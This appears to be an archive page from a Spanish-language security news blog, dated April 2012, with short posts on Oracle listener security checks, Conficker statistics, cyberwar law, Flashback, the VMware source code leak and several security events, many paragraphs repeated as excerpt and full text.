Para los que no estén familiarizados con este puerto, se trata del lugar donde opera el receptor de escucha de base de datos de Oracle. No es ni más ni menos que un demonio que se encuentra esperando solicitudes de conexión de clientes remotos. Y ya os imagináis lo que podría ocurrir si se viese comprometido ¿verdad? He de decir que normalmente las instalaciones de Oracle vienen configuradas para que solo se pueda acceder a estos demonios desde la red interna, evitando así posibles ataques desde el exterior, pero aún así sigue quedando un amplio nido de ratones esperando su porción de queso.
Con el objetivo de solucionar estos problemas y evaluar la seguridad de este demonio nació la herramienta de Ingregy AppSentry Listener Security Check Tool, hace ya algunos años. La importancia de esta vulnerabilidad/mala configuración y herramienta es tal que OWASP definió en su dia el control CM-002 donde se analiza en profundidad.
El funcionamiento de la herramienta de Integrigy es bastante sencillo, simplemente deberemos indicar la IP o el host en el que se encuentra la instalación de Oracle, el puerto por defecto, 1521, y se pulsa sobre el botón "play".
Una vez finalizado nos mostrará un reporte con la información que se encuentre mal configurada de cara a evaluar la seguridad de la instalación (listado de usuarios, contraseñas, versión de instalación, autenticación integrada con el sistema, etc.)
Con la herramienta lsnrctl de Oracle podremos verificar después la configuración:
Os listo a continuación los comandos que podréis ejecutar con lsnrctl:
Para los que no estén familiarizados con este puerto, se trata del lugar donde opera el receptor de escucha de base de datos de Oracle. No es ni más ni menos que un demonio que se encuentra esperando solicitudes de conexión de clientes remotos. Y ya os imagináis lo que podría ocurrir si se viese comprometido ¿verdad? He de decir que normalmente las instalaciones de Oracle vienen configuradas para que solo se pueda acceder a estos demonios desde la red interna, evitando así posibles ataques desde el exterior, pero aún así sigue quedando un amplio nido de ratones esperando su porción de queso.
Con el objetivo de solucionar estos problemas y evaluar la seguridad de este demonio nació la herramienta de Ingregy AppSentry Listener Security Check Tool, hace ya algunos años. La importancia de esta vulnerabilidad/mala configuración y herramienta es tal que OWASP definió en su dia el control CM-002 donde se analiza en profundidad.
El funcionamiento de la herramienta de Integrigy es bastante sencillo, simplemente deberemos indicar la IP o el host en el que se encuentra la instalación de Oracle, el puerto por defecto, 1521, y se pulsa sobre el botón "play".
Con la herramienta lsnrctl de Oracle podremos verificar después la configuración:
Os listo a continuación los comandos que podréis ejecutar con lsnrctl:
- start– Starts the listener with the name specified, otherwise LISTENER will be used. For Windows systems, the listener can also be started and stopped from the Control Panel.
- stop – Stops the listener. For Windows systems, the listener can also be started and stopped from the Control Panel.
- status – Provides status information about the listener, including start date, uptime, and trace level.
- services – Displays each service available, along with the connection history.
- version – Displays the version information of the listener.
- reload – Forces a read of the configuration file in order for new settings to take effect without stopping and starting the listener.
- save_config – Creates a backup of the existing listener.ora file and saves changes to the current version.
- trace – Sets the trace level to one of the following – OFF, USER, ADMIN, or SUPPORT.
- spawn – Spawns a program that runs with an alias in the listener.ora file.
- dbsnmp_start – Starts the DBSNMP subagent.
- dbsnmp_stop – Stops the DBSNMP subagent.
- dbsnmp_status – Displays the status of the DBSNMP subagent.
- change_password – Sets a new password for the listener.
- quit and exit – Exits the utility.
- set – Changes the value of any parameter. Everything that can be shown can be set.
- show – Displays current parameter settings.
Rusia trabaja en un nuevo diseño de seguridad informática para su Ejército
El Ministerio de Defensa de Rusia trabaja en un nuevo diseño de seguridad informática para las Fuerzas Armadas del país, según informó este jueves el viceministro ruso de Defensa, Anatoli Antónov.
"Estamos trabajando en una visión conceptual de las actividades de las Fuerzas Armadas en el ciberespacio que detallará los principios básicos, patrones y medidas de confianza conforme a las cuales las Fuerzas Armadas de Rusia utilizarán el ciberespacio global", anunció Antónov durante una reunión con agregados militares extranjeros acreditados en Moscú.
Según el viceministro, el problema de la seguridad del ciberespacio global constituye un nuevo reto que afrontan Estados Unidos, Rusia y otros países. Y recordó que hace varios años Rusia presentó una serie de propuestas para colaborar en la materia, aunque EEUU rechazó entonces esas iniciativas.
El viceprimer ministro ruso, Dmitri Rogozin reveló, anteriormente, que el Gobierno del país estudia crear un mando cibernético encargado de la seguridad informática del Ejército. En este sentido, indicó Rogozin, Rusia sigue el ejemplo de EEUU y la OTAN que hacen grandes inversiones en proyectos relacionados con la seguridad informática.
Fuente: El Espía Digital
"Estamos trabajando en una visión conceptual de las actividades de las Fuerzas Armadas en el ciberespacio que detallará los principios básicos, patrones y medidas de confianza conforme a las cuales las Fuerzas Armadas de Rusia utilizarán el ciberespacio global", anunció Antónov durante una reunión con agregados militares extranjeros acreditados en Moscú.
Según el viceministro, el problema de la seguridad del ciberespacio global constituye un nuevo reto que afrontan Estados Unidos, Rusia y otros países. Y recordó que hace varios años Rusia presentó una serie de propuestas para colaborar en la materia, aunque EEUU rechazó entonces esas iniciativas.
El viceprimer ministro ruso, Dmitri Rogozin reveló, anteriormente, que el Gobierno del país estudia crear un mando cibernético encargado de la seguridad informática del Ejército. En este sentido, indicó Rogozin, Rusia sigue el ejemplo de EEUU y la OTAN que hacen grandes inversiones en proyectos relacionados con la seguridad informática.
Fuente: El Espía Digital
Curso de Seguridad para PyMEs en Córdoba
No importa el tamaño de la organización, la Información es el activo más importante de las personas. La seguridad que puede lograrse por medios técnicos es limitada y debe ser respaldada por una gestión y procedimientos adecuados.
Este curso de "Seguridad para PyMEs" se llevará a cabo el próximo viernes 4 y sábado 5 de mayo de 9 a 13 hs y tiene el objetivo de hacer conocer al asistente las políticas y normas necesarias dentro de su organización para que la misma cumpla con las mejores prácticas de seguridad internacional.
El temario ha desarrollar durante los dos día es el siguiente:
Cristian de la redacción de Segu-Info
Este curso de "Seguridad para PyMEs" se llevará a cabo el próximo viernes 4 y sábado 5 de mayo de 9 a 13 hs y tiene el objetivo de hacer conocer al asistente las políticas y normas necesarias dentro de su organización para que la misma cumpla con las mejores prácticas de seguridad internacional.
El temario ha desarrollar durante los dos día es el siguiente:
- Políticas y normas
- ISO 27000
- Normas y estándares
- Clasificación de la Información
- Dueños de Datos
- Contratos, DNA, SLA
- Personal
- Herramientas para la concientización del personal Defensa en profundidad
- Networking y Comunicaciones
- Almacenamiento
- Uso de móviles
- Backups
- Cloud Computing
- Desarrollo Seguro
- Gestión de la seguridad
- Gestión de Usuarios
- Autenticación, Autorización y Auditoría (AAA) Gestión de contraseñas
- Control de acceso Administración de Sistemas Operativos y aplicaciones
- Administración de actualizaciones Protección contra software malicioso
- Cifrado de información Correo Electrónico Fuga de información
- Políticas de manejo de incidentes
Cristian de la redacción de Segu-Info
Seminario gratuito de Desarrollo Seguro en UTN Córdoba
El próximo viernes 4 de mayo de 18 hs a 21 hs tendré el placer de volver a ser disertante en la UTN Regional Córdoba. En esta provincia la Industria del Software es uno de los segmentos de mercado que requiere profesionales altamente calificados con un perfil orientado a saber hacer software seguro.
Este seminario gratuito está orientado a conocer los principales vulnerabilidades y amenazas a las que están expuestos los desarrollo web así como la forma de analizarlas, explotarlas y solucionarlas desde el inicio de cualquier proyecto de desarrollo.
Cristian de la Redacción de Segu-Info
Este seminario gratuito está orientado a conocer los principales vulnerabilidades y amenazas a las que están expuestos los desarrollo web así como la forma de analizarlas, explotarlas y solucionarlas desde el inicio de cualquier proyecto de desarrollo.
- Estado en la seguridad del software.
- Principios del diseño de software seguro.
- Identificación de amenazas.
- OWASP Development Guide.
- Testing Black y White Box.
- Ataques de inyección.
- Cross-site Scripting (XSS).
- Autenticación y gestión de sesiones.
- Referencia insegura directa a objetos.
- Falsificación de petición – Cross Site Request Forgery (CSRF).
- Configuración defectuosa y/o por defecto de aplicaciones y objetos.
- Almacenamiento criptográfico inseguro.
- Falla de restricción de acceso a sitios web y su configuración adecuada.
- Validación de capa de transporte.
- Redirecciones no validadas.
Cristian de la Redacción de Segu-Info
Kaspersky: "Apple esta 10 atrás de Microsoft en seguridad"
En declaraciones a CBR en el marco de la conferencia de Info Security 2012, el fundador y CEO de Kaspersky dijo que Apple está 10 años detrás de Microsoft en lo que respecta a la seguridad, y la empresa tendrá que cambiar las formas en que enfrenta los ataques de malware.
"Creo que Apple está diez años por detrás de Microsoft en términos de seguridad. Durante muchos años he estado diciendo que desde el punto de vista de seguridad no hay gran diferencia entre Mac y Windows. Siempre ha sido posible el desarrollo de malware para Mac, pero este era un poco diferente".
Kaspersky dijo que su compañía estaba viendo una creciente cantidad de malware dirigido a la plataforma Mac, similar al aumento de la cuota de mercado de la marca.
"Los delincuentes han reconocido que Mac es un área interesante. Ahora tenemos más y no se trata sólo de Flashback o Flashfake. Bienvenido al mundo de Microsoft, Mac. Está lleno de malware".
"Apple comprenderá muy pronto que no tiene los mismos problemas que Microsoft tenía 10 o 12 años atrás. Tendrán que hacer cambios en la forma de realizar las actualizaciones y se verán obligados a invertir más en sus auditorías de seguridad para el software".
Fuente: Forbes
"Creo que Apple está diez años por detrás de Microsoft en términos de seguridad. Durante muchos años he estado diciendo que desde el punto de vista de seguridad no hay gran diferencia entre Mac y Windows. Siempre ha sido posible el desarrollo de malware para Mac, pero este era un poco diferente".
Kaspersky dijo que su compañía estaba viendo una creciente cantidad de malware dirigido a la plataforma Mac, similar al aumento de la cuota de mercado de la marca.
"Los delincuentes han reconocido que Mac es un área interesante. Ahora tenemos más y no se trata sólo de Flashback o Flashfake. Bienvenido al mundo de Microsoft, Mac. Está lleno de malware".
"Apple comprenderá muy pronto que no tiene los mismos problemas que Microsoft tenía 10 o 12 años atrás. Tendrán que hacer cambios en la forma de realizar las actualizaciones y se verán obligados a invertir más en sus auditorías de seguridad para el software".
Fuente: Forbes
26 abr 2012
Reporte de Inteligencia de Seguridad de Microsoft
Microsoft publicó el doceavo volumen de su Reporte de Inteligencia de Seguridad (SIRv12) [PDF], el cual encontró que el gusano Conficker fue detectado casi 220 millones de veces en los últimos dos años y medio, lo que lo convierte en una de las amenazas más graves para las empresas. El estudio también muestra que el gusano continúa esparciéndose como resultado de contraseñas débiles o robadas y de vulnerabilidades, para las cuales ya existe una actualización de seguridad.
De acuerdo con el Reporte de Inteligencia de Seguridad volumen 12 (SIRv12), las detecciones trimestrales del gusano Conficker han aumentado más de 225% desde principios del 2009. Tan solo en el cuarto trimestre del 2011, Conficker se detectó en 1.7 millones de sistemas en todo el mundo. Al analizar los motivos detrás de las prevalencia de Conficker en las empresas, el estudio mostró que el 92% de las infecciones de Conficker fueron resultado de contraseñas débiles o robadas, y el 8% de las infecciones se debieron a la explotación de vulnerabilidades, para lo cual ya existe una actualización de seguridad.
"Conficker es uno de los problemas de seguridad más grandes que enfrentamos, pero está en nuestro poder defendernos en contra de él", dijo Tim Rains, director de Computación Confiable en Microsoft. "Es sumamente importante que las empresas se enfoquen en los aspectos básicos de la seguridad para poder protegerse en contra de las amenazas más comunes".
El Reporte de Inteligencia de Seguridad de Microsoft también reveló que muchas de las amenazas con frecuencia descritas como ‘Amenazas Persistentes Avanzadas’ o ‘APT’, por sus siglas en inglés, no son más avanzadas ni sofisticadas que otros tipos de ataques. En la mayoría de los casos, esos ataques aprovechan vectores conocidos como contraseñas débiles o robadas o explotaciones de vulnerabilidades, para lo cual ya existen actualizaciones de seguridad, pero su eficacia yace en la persistencia y determinación de probar diferentes tácticas para poner en riesgo al objetivo. Por tal motivo, Microsoft se refiere a esos tipos de amenazas como "ataques dirigidos realizados por adversarios determinados" en lugar de APT.
Fuente: Technet
De acuerdo con el Reporte de Inteligencia de Seguridad volumen 12 (SIRv12), las detecciones trimestrales del gusano Conficker han aumentado más de 225% desde principios del 2009. Tan solo en el cuarto trimestre del 2011, Conficker se detectó en 1.7 millones de sistemas en todo el mundo. Al analizar los motivos detrás de las prevalencia de Conficker en las empresas, el estudio mostró que el 92% de las infecciones de Conficker fueron resultado de contraseñas débiles o robadas, y el 8% de las infecciones se debieron a la explotación de vulnerabilidades, para lo cual ya existe una actualización de seguridad.
"Conficker es uno de los problemas de seguridad más grandes que enfrentamos, pero está en nuestro poder defendernos en contra de él", dijo Tim Rains, director de Computación Confiable en Microsoft. "Es sumamente importante que las empresas se enfoquen en los aspectos básicos de la seguridad para poder protegerse en contra de las amenazas más comunes".
El Reporte de Inteligencia de Seguridad de Microsoft también reveló que muchas de las amenazas con frecuencia descritas como ‘Amenazas Persistentes Avanzadas’ o ‘APT’, por sus siglas en inglés, no son más avanzadas ni sofisticadas que otros tipos de ataques. En la mayoría de los casos, esos ataques aprovechan vectores conocidos como contraseñas débiles o robadas o explotaciones de vulnerabilidades, para lo cual ya existen actualizaciones de seguridad, pero su eficacia yace en la persistencia y determinación de probar diferentes tácticas para poner en riesgo al objetivo. Por tal motivo, Microsoft se refiere a esos tipos de amenazas como "ataques dirigidos realizados por adversarios determinados" en lugar de APT.
Fuente: Technet
Ciberguerra: más preguntas que respuestas
Los vacíos legales sobre ataques informáticos entre gobiernos esta siendo sufrido, y en muchos casos aprovechado, por varias potencias del mundo en la actualidad.
Elaborar una legislación internacional que contemple los ataques informáticos de un estado a otro como actos de guerra, es una de las tareas más complejas que la comunidad diplomática global debe enfrentar en el futuro cercano.
Hoy en día, si por ejemplo, un estado ataca a otro destruyendo una de sus plantas de energía eléctrica con un misil, esto claramente podría ser enmarcado dentro de las Leyes de la Guerra, como un acto de guerra. Ahora que pasaría, si en lugar de utilizar un misil, se realizara un ataque informático que dejara fuera de servicio a la misma planta, ¿podría ser considerado también un acto de guerra?
Esto en la actualidad, no se encuentra totalmente legislado en ningún tratado o convenio internacional, pero supongamos que sí lo estuviera, y pudiéramos definir ciertos tipos de ataques informáticos como actos de guerra, surge una nueva pregunta, ¿cómo se debería responder a estos?
Hay varias corrientes de pensamiento en relación a cómo responder a un ataque proveniente de otro gobierno, algunas sugieren con otro ataque informático, mientras que las más belicosas proponen utilizar cualquier tipo de arma convencional. Pero en general se tiende a pensar en el concepto de "equivalencia", en donde se debería medir el efecto causado, como cantidad de muertes o daños a infraestructura, y responder con un ataque convencional acorde.
También nos encontramos con otras profundas interrogantes, como que pasaría si un país en conflicto con otro, utiliza la infraestructura de comunicaciones de un tercero neutral, para lanzar ataques desde su territorio o a través del mismo, en ese caso, ¿el país neutral tendría algún tipo de responsabilidad? o por ejemplo, en el caso de que un ataque fuera realizado por cibermilicias, como el caso de Estonia del 2007, ¿también puede ser considerado un acto de guerra?
Todos estos son cuestionamientos relacionados a la legislación internacional de la ciberguerra, pero también podemos encontrar muchas otras interrogantes desde el aspecto informático del mismo.
En cualquier caso, los gobiernos van a convivir con este vacío legal por un largo tiempo, en el cual solo les queda esperar que nada realmente grave pase en el mundo.
Fuente: Kungfoosion
Elaborar una legislación internacional que contemple los ataques informáticos de un estado a otro como actos de guerra, es una de las tareas más complejas que la comunidad diplomática global debe enfrentar en el futuro cercano.
Hoy en día, si por ejemplo, un estado ataca a otro destruyendo una de sus plantas de energía eléctrica con un misil, esto claramente podría ser enmarcado dentro de las Leyes de la Guerra, como un acto de guerra. Ahora que pasaría, si en lugar de utilizar un misil, se realizara un ataque informático que dejara fuera de servicio a la misma planta, ¿podría ser considerado también un acto de guerra?
Esto en la actualidad, no se encuentra totalmente legislado en ningún tratado o convenio internacional, pero supongamos que sí lo estuviera, y pudiéramos definir ciertos tipos de ataques informáticos como actos de guerra, surge una nueva pregunta, ¿cómo se debería responder a estos?
Hay varias corrientes de pensamiento en relación a cómo responder a un ataque proveniente de otro gobierno, algunas sugieren con otro ataque informático, mientras que las más belicosas proponen utilizar cualquier tipo de arma convencional. Pero en general se tiende a pensar en el concepto de "equivalencia", en donde se debería medir el efecto causado, como cantidad de muertes o daños a infraestructura, y responder con un ataque convencional acorde.
También nos encontramos con otras profundas interrogantes, como que pasaría si un país en conflicto con otro, utiliza la infraestructura de comunicaciones de un tercero neutral, para lanzar ataques desde su territorio o a través del mismo, en ese caso, ¿el país neutral tendría algún tipo de responsabilidad? o por ejemplo, en el caso de que un ataque fuera realizado por cibermilicias, como el caso de Estonia del 2007, ¿también puede ser considerado un acto de guerra?
Todos estos son cuestionamientos relacionados a la legislación internacional de la ciberguerra, pero también podemos encontrar muchas otras interrogantes desde el aspecto informático del mismo.
En cualquier caso, los gobiernos van a convivir con este vacío legal por un largo tiempo, en el cual solo les queda esperar que nada realmente grave pase en el mundo.
Fuente: Kungfoosion
China: aumenta el #cyberbullying entre estudiantes
Cuando se piensa acerca de la intimidación, uno podría imaginarse un niño que está siendo hostigado por otro en el patio de la escuela. Sin embargo, a medida que más jóvenes tienen acceso a computadoras y teléfonos celulares, la intimidación tradicional se ha vuelto digital, un fenómeno del cual los padres chinos aún no han tomado conciencia.
El término “intimidación cibernética” (del inglés: “cyber-bullying”) fue acuñado por primera vez por el educador canadiense Bill Belsey, y se refiere al uso de Internet y otras tecnologías relacionadas para hacer daño a otras personas, de una manera deliberada, repetida y hostil.
Se trata de amenazas a través de mensajes de texto, además de rumores en línea en sitios de redes sociales, y excluyendo deliberadamente a alguien de un grupo en línea.
La intimidación cibernética está en su punto más alto de todos los tiempos en los Estados Unidos. Según un estudio del Departamento de Justicia de ese país, más del 43% de los adolescentes dicen haber sido víctimas de acoso cibernético.
El término “intimidación cibernética” (del inglés: “cyber-bullying”) fue acuñado por primera vez por el educador canadiense Bill Belsey, y se refiere al uso de Internet y otras tecnologías relacionadas para hacer daño a otras personas, de una manera deliberada, repetida y hostil.
Se trata de amenazas a través de mensajes de texto, además de rumores en línea en sitios de redes sociales, y excluyendo deliberadamente a alguien de un grupo en línea.
La intimidación cibernética está en su punto más alto de todos los tiempos en los Estados Unidos. Según un estudio del Departamento de Justicia de ese país, más del 43% de los adolescentes dicen haber sido víctimas de acoso cibernético.
Facebook lanza un Marketplace de Antivirus
El portal apunta a darle a los usuarios de la red social una mayor seguridad mientras navegan por Internet.
Los programas disponibles son: Norton Anti-Virus 2012, Trend Micro Titanium Security Essentials, Smart Surfing para Mac, McAfee y otros. Los equipos tendrán una licencia gratuita por seis meses.
"Creemos que armar a nuestros usuarios con software de antivirus les permitirá mantenerse seguros sin importar dónde estén en la web", señaló la firma en un comunicado oficial.
Asimismo, la compañía anunció que el servicio incorpora las listas negras de las firmas antes mencionadas a su registro, para que los usuarios puedan ser advertidos en caso de que algún enlace malicioso se filtre en la popular red social.
La colaboración nos beneficia a todos, pues ahora la lista negra de URLs de Facebook será mucho más eficiente al combinarse con las bases de datos de estas empresas. Sin embargo el marketplace que lanzaron deja mucho que desear.
Solicitan hacer un Like (clic en Me gusta) a la fan page del fabricante parece que la promoción de los 6 meses no está disponible para todos los países, pues lo intenté con otra cuenta, otro antivirus y a pesar de aceptar el "Me gusta" obligado, no se activó ninguna descarga.
Fuente: Infobae y SpamLoco
Lanzan Firefox 12
Firefox 12 ya está disponible para Windows, Mac y Linux. En la versión para Windows, elimina la ventana de diálogo del control de cuentas de usuario (UAC), facilitando el proceso de actualización para estos usuarios, ya que, una vez dado el permiso a Firefox durante su primera instalación, no se volverá a solicitar en las siguientes actualizaciones del navegador.
UAC es una función de seguridad que Microsoft introdujo en Vista y, de forma menos intrusiva, en Windows 7, que solicita el permiso de los usuarios para la instalación de la mayoría de programas. Firefox 12 será la primera edición del navegador de código abierto en evitar este control permitiendo las actualizaciones "silenciosas", aunque no se hará de una forma totalmente transparente hasta la versión número 13, prevista para junio. En esta edición, Firefox se salta UAC sustituyendo el tradicional proceso de instalación por un servicio Windows creado por Mozilla.
Otra novedad en Firefox 12 son las 85 mejoras para las herramientas de desarrollo integradas. Así, ahora los desarrolladores ya no tendrán que recargar la página para ver los mensajes en la consola web, y la herramienta Scratchpad, pensada para crear y probar en el navegador segmentos de código de JavaScript, incorpora ahora nuevos comandos como "Buscar" e "Ir a la Línea".
Además, la organización ha anunciado que retirará Firefox 3.6 y actualizará automáticamente a los usuarios de esta versión a Firefox 12 si ellos no lo han hecho. Según Net Applications, Firefox 3.6 acaparaba el 13% de todas las copias de Firefox utilizadas el pasado mes, frente al 79% de hace un año.
Fuente: CIOAL
UAC es una función de seguridad que Microsoft introdujo en Vista y, de forma menos intrusiva, en Windows 7, que solicita el permiso de los usuarios para la instalación de la mayoría de programas. Firefox 12 será la primera edición del navegador de código abierto en evitar este control permitiendo las actualizaciones "silenciosas", aunque no se hará de una forma totalmente transparente hasta la versión número 13, prevista para junio. En esta edición, Firefox se salta UAC sustituyendo el tradicional proceso de instalación por un servicio Windows creado por Mozilla.
Otra novedad en Firefox 12 son las 85 mejoras para las herramientas de desarrollo integradas. Así, ahora los desarrolladores ya no tendrán que recargar la página para ver los mensajes en la consola web, y la herramienta Scratchpad, pensada para crear y probar en el navegador segmentos de código de JavaScript, incorpora ahora nuevos comandos como "Buscar" e "Ir a la Línea".
Además, la organización ha anunciado que retirará Firefox 3.6 y actualizará automáticamente a los usuarios de esta versión a Firefox 12 si ellos no lo han hecho. Según Net Applications, Firefox 3.6 acaparaba el 13% de todas las copias de Firefox utilizadas el pasado mes, frente al 79% de hace un año.
Fuente: CIOAL
25 abr 2012
Robado el código fuente VMware ESX
Parte del código fuente de VMware ESX ha sido robado y publicado en línea, pero la compañía dice esto no representa necesariamente un aumento del riesgo en los clientes.
El código fue robado en un único archivo en algún momento entre 2003 ó 2004, según el blog de la compañía. "El hecho de que el código fuente haya sido públicamente compartido no significa necesariamente que haya un riesgo particular para los clientes de VMware", dijo Iain Mulholland, director de VMware Security Response Center.
El código fue robado de una empresa china llamada Electrónica de China Import & Export Corporation (CEIEC) durante un ataque en marzo, de acuerdo a un post en el blog de Kaspersky. El código fue robado junto con otros correos electrónicos internos de VMware y se publicaron en línea hace tres días. Al parecer CEIEC fue atacado y se encontró el código fuente en forma fortuita.
A principios de este mes un integrante LulzSec llamado "Hardcore Charlie" dijo a Reuters que él obtuvo la información desde CEIEC cuando buscaba datos de la campaña militar de EE.UU. en Afganistán.
Eric Chiu, presidente de la empresa de seguridad de virtualización HyTrust, dice que es difícil decir lo que los clientes deben hacer porque no hay suficientes detalles sobre cómo el código expuesto está siendo utilizado en los productos actuales.
Fuente: Network World
El código fue robado en un único archivo en algún momento entre 2003 ó 2004, según el blog de la compañía. "El hecho de que el código fuente haya sido públicamente compartido no significa necesariamente que haya un riesgo particular para los clientes de VMware", dijo Iain Mulholland, director de VMware Security Response Center.El código fue robado de una empresa china llamada Electrónica de China Import & Export Corporation (CEIEC) durante un ataque en marzo, de acuerdo a un post en el blog de Kaspersky. El código fue robado junto con otros correos electrónicos internos de VMware y se publicaron en línea hace tres días. Al parecer CEIEC fue atacado y se encontró el código fuente en forma fortuita.
A principios de este mes un integrante LulzSec llamado "Hardcore Charlie" dijo a Reuters que él obtuvo la información desde CEIEC cuando buscaba datos de la campaña militar de EE.UU. en Afganistán.
Eric Chiu, presidente de la empresa de seguridad de virtualización HyTrust, dice que es difícil decir lo que los clientes deben hacer porque no hay suficientes detalles sobre cómo el código expuesto está siendo utilizado en los productos actuales.
Fuente: Network World
Utilizaron WordPress para distribuir #Flashback
Miles de sitios Web que operan con la plataforma de blogging, WordPress fueron utilizados por los responsables de Flashback para ampliar la capacidad de distribución del malware que a principios de abril puso en jaque los sistemas de seguridad de las Mac.
De acuerdo con una investigación a cargo de Kaspersky, diversos sitios de WordPress fueron infectados sin que los administradores de los mismos se percatarán que su portal era utilizado como una plataforma de distribución maliciosa.
Los portales infectados redirigían a los internautas a una página que tenía instalado Flashabck, de este manera dichos internautas se convertían también en víctimas del malware y así la distribución del mismo se aceleraba de manera vertiginosa, alertó Kaspersky.
Una investigación de Websense indica que más de 30,000 sitios basados en WordPress fueron utilizados por los criminales, 85% de los portales infectados se encuentran basados en Estados Unidos, alertó la firma de seguridad.
Los analistas de Websense recomendaron a los administradores de sitios basados en WordPress mantener actualizados sus portales para evitar que éstos sean vulnerables frente a los embates de los cibercriminales.
Fuente: bSecure
De acuerdo con una investigación a cargo de Kaspersky, diversos sitios de WordPress fueron infectados sin que los administradores de los mismos se percatarán que su portal era utilizado como una plataforma de distribución maliciosa.
Los portales infectados redirigían a los internautas a una página que tenía instalado Flashabck, de este manera dichos internautas se convertían también en víctimas del malware y así la distribución del mismo se aceleraba de manera vertiginosa, alertó Kaspersky.
Una investigación de Websense indica que más de 30,000 sitios basados en WordPress fueron utilizados por los criminales, 85% de los portales infectados se encuentran basados en Estados Unidos, alertó la firma de seguridad.
Los analistas de Websense recomendaron a los administradores de sitios basados en WordPress mantener actualizados sus portales para evitar que éstos sean vulnerables frente a los embates de los cibercriminales.
Fuente: bSecure
Argentina: Se firmó acuerdo de intercambio de información tributaria con Uruguay
Argentina y Uruguay firmaron un acuerdo de intercambio de información
tributaria y de eliminación de la doble tributación, un reclamo de la
Organización para la Cooperación y el Desarrollo Económicos (OCDE),
anunció el ministro de Economía uruguayo, Fernando Lorenzo.
"El acuerdo (...) incluye tanto normativa que prevé los problemas relativos a evitar, la doble tributación, como los aspectos que tienen que ver con el intercambio efectivo de información para la cooperación tributaria internacional", dijo Lorenzo en conferencia de prensa.
El tratado fue suscrito en la estancia presidencial de Anchorena, 208 km al oeste de Montevideo con el titular de la Administración Federal de Ingresos Públicos (AFIP), Ricardo Etchegaray, indicó.
Echegaray señaló que el convenio suscripto por ambos países "cumple con los estándares del Foro Global sobre Transparencia e Intercambio de Información Tributaria de la Organización para la Cooperación y el Desarrollo Económico (OCDE)".
Ahora debe ser ratificado por los parlamentos de los dos países, tras lo cual entrará en vigencia.
Según explicó Lorenzo, el tratado establece claramente de qué manera debe solicitarse la información, que debe ser mediante un pedido "fundado y explícito", presentado en forma individualizada.
Además, destacó que no se aplicará la retroactividad cuando el tratado sea ratificado y descartó que haya actuaciones conjuntas de las entidades fiscalizadoras en los territorios.
Lorenzo añadió que el acuerdo "incluye explícitamente normativa referida a métodos específicos para evitar la doble tributación y eso es una garantía muy importante para quienes realizan negocios en Uruguay".
En ese sentido, la forma de evitar la doble tributación será otorgando "créditos tributarios por los impuestos pagados en un país para que sirvan como certificación de pago de impuestos en el otro Estado".
Para el ministro, el nuevo acuerdo es "una herramienta fundamental para ser parte de la cooperación internacional en materia tributaria".
El objetivo del gobierno es completar lo antes posible las acciones para que Uruguay ingrese a la fase 2 del Acuerdo de Transparencia de la OCDE, lo que le permitiría mejorar su estatus internacional para captar inversores internacionales.
La OCDE retiró en diciembre pasado a Uruguay de la 'lista gris' de paraísos fiscales pero le reclamó nuevos acuerdos de intercambio de información tributaria -fundamentalmente con Argentina y Brasil- entre otras exigencias.
"Estamos cumpliendo uno de los requisitos", enfatizó Lorenzo, recordando que otra exigencia fue la identificación de los propietarios de las acciones al portador, proyecto actualmente en tramitación parlamentaria.
Tras el acuerdo con Argentina, Uruguay pondrá el acelerador a la negociación de un tratado similar con Brasil, país con el que ya "se está trabajando" y se ha "avanzado en algunos aspectos".
El gobierno aspira a solicitar a mediados de año a la OCDE una nueva revisión para demostrar que está en condiciones de acceder a la fase siguiente en materia de transparencia tributaria.
El convenio con Argentina se suma a los que Uruguay tiene firmados con Alemania, Dinamarca, Ecuador, España, Finlandia, Francia, Groenlandia, Hungría, Islas Feroe, Islandia, Liechtenstein, Malta, México, Noruega, Portugal, República de Corea (Corea del Sur), Suecia y Suiza.
Fuente: Ambito
"El acuerdo (...) incluye tanto normativa que prevé los problemas relativos a evitar, la doble tributación, como los aspectos que tienen que ver con el intercambio efectivo de información para la cooperación tributaria internacional", dijo Lorenzo en conferencia de prensa.
El tratado fue suscrito en la estancia presidencial de Anchorena, 208 km al oeste de Montevideo con el titular de la Administración Federal de Ingresos Públicos (AFIP), Ricardo Etchegaray, indicó.
Echegaray señaló que el convenio suscripto por ambos países "cumple con los estándares del Foro Global sobre Transparencia e Intercambio de Información Tributaria de la Organización para la Cooperación y el Desarrollo Económico (OCDE)".
Ahora debe ser ratificado por los parlamentos de los dos países, tras lo cual entrará en vigencia.
Según explicó Lorenzo, el tratado establece claramente de qué manera debe solicitarse la información, que debe ser mediante un pedido "fundado y explícito", presentado en forma individualizada.
Además, destacó que no se aplicará la retroactividad cuando el tratado sea ratificado y descartó que haya actuaciones conjuntas de las entidades fiscalizadoras en los territorios.
Lorenzo añadió que el acuerdo "incluye explícitamente normativa referida a métodos específicos para evitar la doble tributación y eso es una garantía muy importante para quienes realizan negocios en Uruguay".
En ese sentido, la forma de evitar la doble tributación será otorgando "créditos tributarios por los impuestos pagados en un país para que sirvan como certificación de pago de impuestos en el otro Estado".
Para el ministro, el nuevo acuerdo es "una herramienta fundamental para ser parte de la cooperación internacional en materia tributaria".
El objetivo del gobierno es completar lo antes posible las acciones para que Uruguay ingrese a la fase 2 del Acuerdo de Transparencia de la OCDE, lo que le permitiría mejorar su estatus internacional para captar inversores internacionales.
La OCDE retiró en diciembre pasado a Uruguay de la 'lista gris' de paraísos fiscales pero le reclamó nuevos acuerdos de intercambio de información tributaria -fundamentalmente con Argentina y Brasil- entre otras exigencias.
"Estamos cumpliendo uno de los requisitos", enfatizó Lorenzo, recordando que otra exigencia fue la identificación de los propietarios de las acciones al portador, proyecto actualmente en tramitación parlamentaria.
Tras el acuerdo con Argentina, Uruguay pondrá el acelerador a la negociación de un tratado similar con Brasil, país con el que ya "se está trabajando" y se ha "avanzado en algunos aspectos".
El gobierno aspira a solicitar a mediados de año a la OCDE una nueva revisión para demostrar que está en condiciones de acceder a la fase siguiente en materia de transparencia tributaria.
El convenio con Argentina se suma a los que Uruguay tiene firmados con Alemania, Dinamarca, Ecuador, España, Finlandia, Francia, Groenlandia, Hungría, Islas Feroe, Islandia, Liechtenstein, Malta, México, Noruega, Portugal, República de Corea (Corea del Sur), Suecia y Suiza.
Fuente: Ambito
Evento gratuito OWASP Argentina
La Facultad de Ingeniería junto con OWASP Argentina invitan a participar de la Jornada de Seguridad en aplicaciones WEB OWASP Latam Tour Buenos Aires, que se realizará el próximo Lunes 14 de Mayo en el Aula Magna, Facultad de Ingeniería de la Universidad de la Marina Mercante ubicado en Av. Rivadavia 2258.
Algunos de los profesionales invitados son:
